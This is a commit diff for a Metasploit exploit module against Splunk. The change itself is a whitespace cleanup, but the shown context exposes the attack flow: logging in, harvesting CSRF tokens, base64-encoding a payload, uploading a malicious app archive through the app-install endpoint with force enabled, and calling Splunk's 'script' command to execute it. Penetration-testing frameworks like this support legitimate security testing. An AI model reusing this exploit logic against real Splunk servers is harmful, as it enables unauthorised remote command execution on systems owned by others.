Update splunk_upload_app_exec.rb

2019-03-19 14:42:56 +01:00 · 2019-03-19 14:42:56 +01:00 · 98a7938837
parent aff77e58bf
commit 98a7938837
1 changed files with 6 additions and 10 deletions
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb
+++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb
@ -124,19 +124,18 @@ class MetasploitModule < Msf::Exploit::Remote
    @state_token = ''
    @splunkweb_csrf_token_8000_id = ''
    @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below.
-    @ver7 = false # splunk version 7 boolean 
-
+    @ver7 = false # splunk version 7 boolean
    app_name = 'upload_app_exec'
    p = payload.encoded
    print_status("Using command: #{p}")
    cmd = Rex::Text.encode_base64(p)

-    # check if the target version is 7.2.4 
+    # check if the target version is 7.2.4
    if target.name.include? "7.2.4"
      @ver7 = true
    end

-    do_login 
+    do_login

    # fetch the csrf token for use in the upload next
    if @ver7 == true
@ -158,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
      # get the next csrf token from our new app
      do_get_csrf("/en-US/app/#{app_name}/flashtimeline")
    end
-    
+
    # call our command execution function with the Splunk 'script' command
    print_status("Invoking script command")
    if @ver7 == true
@ -345,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
        @auth_cookies = "#{session_id_port}=#{session_id}"
    end
  end
- 
+
  def do_upload_app(app_name, file_name)
    archive_file_name = ::File.basename(file_name)
    print_status("Uploading file #{archive_file_name}")
@ -397,21 +396,18 @@ class MetasploitModule < Msf::Exploit::Remote
    data =  "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"state\"\r\n"
    data << "\r\n#{@state_token}\r\n"
-
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n"
    data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n"
-    
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n"
    data << "Content-Type: application/x-compressed-tar\r\n\r\n"
    data << file_data
    data << "\r\n--#{boundary}\r\n"
-
    data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
    data << "1"
    data << "\r\n--#{boundary}--\r\n"
-  
+
    res = send_request_cgi(
      {
        'uri' => '/en-US/manager/appinstall/_upload',